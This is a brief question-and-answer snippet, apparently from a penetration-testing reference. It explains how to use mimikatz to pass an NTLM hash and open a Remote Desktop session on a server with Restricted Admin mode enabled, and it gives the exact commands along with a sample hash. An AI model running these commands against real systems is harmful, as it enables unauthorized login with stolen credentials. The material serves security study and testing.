One Day Sec

How can mimikatz be used to pass the hash for Remote Desktop when Restricted Admin mode is enabled?

With administrator privileges, run `mimikatz` and execute: `privilege::debug` then `sekurlsa::pth /user:administrator /domain:remoteserver /ntlm:d25ecd13fddbb542d2e16da4f9e0333d "/run:mstsc.exe /restrictedadmin"`. This launches the Remote Desktop client with the given hash, and since Restricted Admin mode is enabled on the server, you can log in without needing a password. This technique relies on the client and server both supporting Restricted Admin mode, as explained in Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode).